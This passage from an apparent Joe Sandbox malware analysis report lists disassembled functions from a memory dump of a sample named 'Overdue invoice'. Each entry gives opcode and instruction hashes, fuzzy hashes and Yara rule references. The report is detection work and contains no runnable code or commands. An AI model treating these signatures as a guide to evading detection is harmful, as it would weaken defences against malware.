                                                                          • Instruction Fuzzy Hash: 8931E734F002044BDB64DF66989476EBAE6EF89360F54842DE50ADB381DA34ED01C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C69660 Relevance: .1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7d0f958ccb88ea1203bf308a6ae3297a0acc940e6ad6a0440c843a9e60168e49
                                                                          • Instruction ID: 16a255b8c1e9e059d0a67fe8fc60ea119223dbd8fa31b18a58da79433b0a8263
                                                                          • Opcode Fuzzy Hash: 7d0f958ccb88ea1203bf308a6ae3297a0acc940e6ad6a0440c843a9e60168e49
                                                                          • Instruction Fuzzy Hash: 0E31B635F002158FDF90BFB999846AEB6F5AF88750F148429E905E7344EF349D018BE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6DE08 Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ea1874eaf86fcd8e188f73b5ae7cdefb188e2bca31f7da6d63b1fe5c594930b
                                                                          • Instruction ID: 6b0c16860a55ab00194a5c5041201477534bdd82761e6231c2533538de9843cf
                                                                          • Opcode Fuzzy Hash: 0ea1874eaf86fcd8e188f73b5ae7cdefb188e2bca31f7da6d63b1fe5c594930b
                                                                          • Instruction Fuzzy Hash: FE31E834F002048BDB64DF6698D476EFAE2EF89360F54842DE50ADB384DA34ED01C7A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C64E60 Relevance: .1, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb14710844ef047a1437f78ad5e9772c6d6a9d892f44045f04f6d0cee6ad444d
                                                                          • Instruction ID: cf4295baa5f33f89e86a102ad0ffa6f08f9cecba9d244e2c148fb7691584d27e
                                                                          • Opcode Fuzzy Hash: cb14710844ef047a1437f78ad5e9772c6d6a9d892f44045f04f6d0cee6ad444d
                                                                          • Instruction Fuzzy Hash: 8C318F34E012099FDB44DFA5D980ADEBBF6EB89310F24C469E504EB341D7319941CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C69657 Relevance: .1, Instructions: 81COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ac5a0bb63b8d52cd29e2d1f9bd272c0bb426f81048b019105ca17b3ca6a02c1
                                                                          • Instruction ID: fce41fff51053e1b742153a5be652ada2ddeb2234f6524cbb21aaf6ccabea1bc
                                                                          • Opcode Fuzzy Hash: 0ac5a0bb63b8d52cd29e2d1f9bd272c0bb426f81048b019105ca17b3ca6a02c1
                                                                          • Instruction Fuzzy Hash: BC21A136F002159FDB50AFBA99846AEBBF9AB48750F148029E915E7344EF309D018BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6ABB8 Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f0bf1aea7d42e1ffc78d01e78440625efe6c2321535bc33d7a86862ecf0ceccf
                                                                          • Instruction ID: 24932df9486dbf56b80463b4dd9b71c838aacc73cc9308b9ecab7b8e489e4381
                                                                          • Opcode Fuzzy Hash: f0bf1aea7d42e1ffc78d01e78440625efe6c2321535bc33d7a86862ecf0ceccf
                                                                          • Instruction Fuzzy Hash: 37218630B101049FDB54EBBAC994B6D76F6AF89614F108169F412BB3A0DB728D00C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6ABB3 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fcbf70a152907006e08242f193a4c6f167633ae2065e5872fcc4d9d01cb9050
                                                                          • Instruction ID: 3052a961917b9763d23265ffcb9d6b3d17666c18d3162050b72670ba37b0de8e
                                                                          • Opcode Fuzzy Hash: 3fcbf70a152907006e08242f193a4c6f167633ae2065e5872fcc4d9d01cb9050
                                                                          • Instruction Fuzzy Hash: 47218731B10215AFDB54DBAAC994BAA77F6EF89604F108169F402FB360DB728D00CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C64E4F Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cab11f098c20f271fb0ea002f257c72c51ed0a175c5b48e2bb3b374b91d621b1
                                                                          • Instruction ID: 7b0f7cf72e6741e50ee4ff0d9e192508ef93f8e0a03ba8665d180b1226503d6e
                                                                          • Opcode Fuzzy Hash: cab11f098c20f271fb0ea002f257c72c51ed0a175c5b48e2bb3b374b91d621b1
                                                                          • Instruction Fuzzy Hash: 26219D75E012189FCB84DFA5D9809DEBFF2EB89310F20C16AE508EB311D3319942CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A9E3 Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 75fa5f17581c46ca1f649e6dea0b1c6fa8910043b4de70307b8eb2d78467c58e
                                                                          • Instruction ID: 61be9d276296e142cb0fc687fbb18254c1c51b2d2ce32e160c1b9a9c3f1b7c95
                                                                          • Opcode Fuzzy Hash: 75fa5f17581c46ca1f649e6dea0b1c6fa8910043b4de70307b8eb2d78467c58e
                                                                          • Instruction Fuzzy Hash: 7321A730E043844ADBB29B56C5C435D7B47EBC3248F28C59EE0595E64AC777C546836A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C69823 Relevance: .1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dd448ff3323936cd562841c9fa53d7c5588152804f2f151fe5748f74b937a00
                                                                          • Instruction ID: 2fb528a73191b40c1dcd75cf829e5d626f72ee5eeab71bf8266f55eb97520c2b
                                                                          • Opcode Fuzzy Hash: 8dd448ff3323936cd562841c9fa53d7c5588152804f2f151fe5748f74b937a00
                                                                          • Instruction Fuzzy Hash: 5B211574E102188BCF54EFB1D894AADBBB5FF88300F504069E90AEB344EB346845CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C657DE Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e6ea9b6ded9ed622ed3041ac2558b913b9e4b73c75503bf89c3de345346a7c9
                                                                          • Instruction ID: c0a4055ebf9a4f06d2d0992153b72fead87d8fa5099c288a7356fcfdb3629a8b
                                                                          • Opcode Fuzzy Hash: 3e6ea9b6ded9ed622ed3041ac2558b913b9e4b73c75503bf89c3de345346a7c9
                                                                          • Instruction Fuzzy Hash: B3112C30D053499FD740EB7A8C406AE7FF1DB46300F90447AE004DB352DB3985018BD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6ABAF Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 01f5278eb3039376887397b55c32e82ee22bc9a766f71fbefbb6541529f94bb0
                                                                          • Instruction ID: 9c2342aee50e2f90b79b0f32c79aebc794a10d5502705c88bef036a2f0330137
                                                                          • Opcode Fuzzy Hash: 01f5278eb3039376887397b55c32e82ee22bc9a766f71fbefbb6541529f94bb0
                                                                          • Instruction Fuzzy Hash: 8C116330B502059FDB94EBAAC9D4B6D76F5AF88604F204159F402FB360DB768D00CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68EFB Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 950241f58a79f7218aae96c0f21baed32ffaa212bbf929a6e880cf637ed0f379
                                                                          • Instruction ID: 1ec12d7022cf2a8cc67fe542a258c38912feb8842f9decfa9d3f6898b5aa7c04
                                                                          • Opcode Fuzzy Hash: 950241f58a79f7218aae96c0f21baed32ffaa212bbf929a6e880cf637ed0f379
                                                                          • Instruction Fuzzy Hash: A9113335F001188F8B80EBBAD89499EB7F5FBC8710B548529E519E7354EF349D018BE6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A8E9 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0488480cec66442ad7f0b8242da1fadcbe5005085e24c3b454cec03bbd54773
                                                                          • Instruction ID: 9573e32267e02e7ee405354a2788d64d5ac08b2bd4da337e1fd6f8b4e1ab7508
                                                                          • Opcode Fuzzy Hash: a0488480cec66442ad7f0b8242da1fadcbe5005085e24c3b454cec03bbd54773
                                                                          • Instruction Fuzzy Hash: 38012434B5D3848FE70242B6AC506B23BB6CB86214F1A80F7F548DF292D4298D178365
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65A60 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4b40d3909e1d7f1bd489ea0212a73df24e21f664929e580984cc8f48e2351c71
                                                                          • Instruction ID: 7108aca36de0cd7ac5703a72e2d905ad95a6c55a6385dafe7e3f30c26d996c75
                                                                          • Opcode Fuzzy Hash: 4b40d3909e1d7f1bd489ea0212a73df24e21f664929e580984cc8f48e2351c71
                                                                          • Instruction Fuzzy Hash: FC113335F002158FCB80EF79D89899EBBF6FB8C6117108429E50AD3354EB34AD418BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68F00 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c1c4113e2d77485c0a2878bef4a619eb70b3becd3be9dfa1ff55a1b94f548d77
                                                                          • Instruction ID: 6e41c4931e0d96c4b390bc1ae2b677b857b32756423df37cfcf62281178e0f2f
                                                                          • Opcode Fuzzy Hash: c1c4113e2d77485c0a2878bef4a619eb70b3becd3be9dfa1ff55a1b94f548d77
                                                                          • Instruction Fuzzy Hash: B0111635F001148F8B80EBBAD99499EB7F5FBC8610B548429E519E7354EB349D018BE6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A42B Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9f602d6b302e2e29c27518090a513001bba21074a6af2091dbb58e5c6ea6480
                                                                          • Instruction ID: 2885336642977e6d0338cfb9ca699f9de7b7a700c6f702bf99d0052c50dec2a2
                                                                          • Opcode Fuzzy Hash: b9f602d6b302e2e29c27518090a513001bba21074a6af2091dbb58e5c6ea6480
                                                                          • Instruction Fuzzy Hash: 58012B35F042245BCB907775AC58AAFB7A9EB80264F504A38F915D7384EE319C0187D4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68308 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36184d2fd0b11cd12dc8991cbe111ca0e50a4d3c98712336ed6a3210d934ba12
                                                                          • Instruction ID: 6a7a2c4e75008629973050a835e058af2f4286c141b7f1b5ce89f932d8d63e9a
                                                                          • Opcode Fuzzy Hash: 36184d2fd0b11cd12dc8991cbe111ca0e50a4d3c98712336ed6a3210d934ba12
                                                                          • Instruction Fuzzy Hash: B7014875A102218FCB50AF79E88895E7BF8AF487527114469E90AD7311EA30DD008BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6914B Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 203487f852afc411facce655d73cbbf34eeaf4cb8af52edb4d1e7ff32d62902b
                                                                          • Instruction ID: e48df058c19542b2077e3e60cdcff63705990840a7c00cbf66a60066fbd75f7c
                                                                          • Opcode Fuzzy Hash: 203487f852afc411facce655d73cbbf34eeaf4cb8af52edb4d1e7ff32d62902b
                                                                          • Instruction Fuzzy Hash: F7F08B326052149BC700AA25EC40ADBB7EEEBC5754F004438FA0197240D732AD168BE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C67610 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 51aaf82f28928e29247b5eaddd29d893e8eae28ed149b2e6268ea18c82268a12
                                                                          • Instruction ID: c5cde001a821acec5530724e6bb225c6041aff49228fba666b98fad0da337681
                                                                          • Opcode Fuzzy Hash: 51aaf82f28928e29247b5eaddd29d893e8eae28ed149b2e6268ea18c82268a12
                                                                          • Instruction Fuzzy Hash: EDF0E2317056609FC745662F8C542BBBBEECFC2A21B0444AEF05AC7292DA24CD0B83A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C67EF1 Relevance: .0, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88c0bcddc240ac12c3a07905873315b2449bdcff85ff2b2c3db0daf898a6bdf6
                                                                          • Instruction ID: a31621f8a91f22a86fdcbb0d10d8d1dcd43ce43c6def79b9558548d9173ef310
                                                                          • Opcode Fuzzy Hash: 88c0bcddc240ac12c3a07905873315b2449bdcff85ff2b2c3db0daf898a6bdf6
                                                                          • Instruction Fuzzy Hash: 05F0E9313142505FD7149B3AEC98D663BEAEFC662570500FAF405CF3B6DA60DD0187A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68270 Relevance: .0, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4879cd2886dee2181320eb372225aef1d706a15845061e18dc371653b2e2a4e9
                                                                          • Instruction ID: 33e6168c2c0f82b6a56ada356e2f03033173bed044506d32c1288f3a8a0b3795
                                                                          • Opcode Fuzzy Hash: 4879cd2886dee2181320eb372225aef1d706a15845061e18dc371653b2e2a4e9
                                                                          • Instruction Fuzzy Hash: 7E01E874E01219DFCF44EFBAD8846EEBBF5BF48200F108429E419E7250E73859018BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A423 Relevance: .0, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d957564d45d25e903284350791379a619f8f93f179e4b947cb2e902f29b3f5d5
                                                                          • Instruction ID: 0c77de6a5162341099eec469305dd1462b93c286cf7593a609f618280d4e6711
                                                                          • Opcode Fuzzy Hash: d957564d45d25e903284350791379a619f8f93f179e4b947cb2e902f29b3f5d5
                                                                          • Instruction Fuzzy Hash: C1F0B436F042204BCF907BB5BC9866EB395EB84625B504A28E916EB388EF74CD0187C4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A85B Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee61b7aed24235b53b9d290d0c288d4549fe7fddb60d200254141243d0a6bfaf
                                                                          • Instruction ID: 03c29acb0212ec963c72ae3c59b29185b97c328ef31bfba1886fa0e14ca98237
                                                                          • Opcode Fuzzy Hash: ee61b7aed24235b53b9d290d0c288d4549fe7fddb60d200254141243d0a6bfaf
                                                                          • Instruction Fuzzy Hash: 5CF0B475F002195B8B90B7BA58446AFBEE9DF89290B104136E509D3300EE309D0187E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68272 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 067fa8c7a15f72548cec9d5e40311667d4dbf371b2533fc0f479799fc9cde6cd
                                                                          • Instruction ID: a750fafb3ba9c042bb04adf57d7e5e6a4b46374e3b1f8c6f3f1e627b672ef08b
                                                                          • Opcode Fuzzy Hash: 067fa8c7a15f72548cec9d5e40311667d4dbf371b2533fc0f479799fc9cde6cd
                                                                          • Instruction Fuzzy Hash: 90F01D74E01215DFCF44EFBAD8442EEBBF1BF48200F108529E409E7250E73459018FA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C67F00 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 43bcb56684582630da4f5422c165c52181f24b33c2b46d4c50834d0764934402
                                                                          • Instruction ID: 94af0abb2912460a47730616f9cc7127dbc3f96179dfcd0938161540e5b96445
                                                                          • Opcode Fuzzy Hash: 43bcb56684582630da4f5422c165c52181f24b33c2b46d4c50834d0764934402
                                                                          • Instruction Fuzzy Hash: 21F012357101108FD718AB2AD898D2A37AAFFC4715B0544A9F506CB365DE70DC018B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A860 Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8456f5e8f80b02c16fcc06d52390a4ea604d70c27a29a8e8c6dd68dc346ffcff
                                                                          • Instruction ID: 9b4c25b29525b7aa3aec4c28b804409316eaeff1c9a96bf507c01246f9aff820
                                                                          • Opcode Fuzzy Hash: 8456f5e8f80b02c16fcc06d52390a4ea604d70c27a29a8e8c6dd68dc346ffcff
                                                                          • Instruction Fuzzy Hash: 44F08276F002185F8B80FBBA58442AFBAE9AF88250F104539E519E3304EE349D0187D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C64DE2 Relevance: .0, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 807e707b13d28dd99cb50703e7cb4bd9fbb600caa67c3dd1ab93c8aa8c57d5f2
                                                                          • Instruction ID: 07c4da6d894c8cefc788e0300fe1d3588857bd0149b59cc2ee2b3c8ebb6a34bf
                                                                          • Opcode Fuzzy Hash: 807e707b13d28dd99cb50703e7cb4bd9fbb600caa67c3dd1ab93c8aa8c57d5f2
                                                                          • Instruction Fuzzy Hash: 84E09B76E001186F8750DB7DAC055EF7FFDDA89261B004576F609D3200DA70490187E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65AC1 Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 567d685e6e4b5ec4ed2fc5797b97bf2aa4909d5b7adec504b43b02f31f34261c
                                                                          • Instruction ID: ed1727a1e6d089a29c204ad971de12a2dd418a5d69f4cfdb7d1cb5ee9ff304cf
                                                                          • Opcode Fuzzy Hash: 567d685e6e4b5ec4ed2fc5797b97bf2aa4909d5b7adec504b43b02f31f34261c
                                                                          • Instruction Fuzzy Hash: F4F0A539F101158FCB45EFA9E89C59DB7F6FB88316B118065E906D3354DB34AC428B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68F5F Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6e5030fb0f98baf847cd8de2e7dcf94154fd25298a4c14cfb3ab5697c10ac8ba
                                                                          • Instruction ID: 759eac93f27b9a813aa113d3c8ec9bb3d9d17e1df3a75ffd2f9f3a2b17d9d4d9
                                                                          • Opcode Fuzzy Hash: 6e5030fb0f98baf847cd8de2e7dcf94154fd25298a4c14cfb3ab5697c10ac8ba
                                                                          • Instruction Fuzzy Hash: CAE0ED36B001148B8F80FBFAD89449DB3F1BBC8211B544464F516E7354DE34AC019BA6
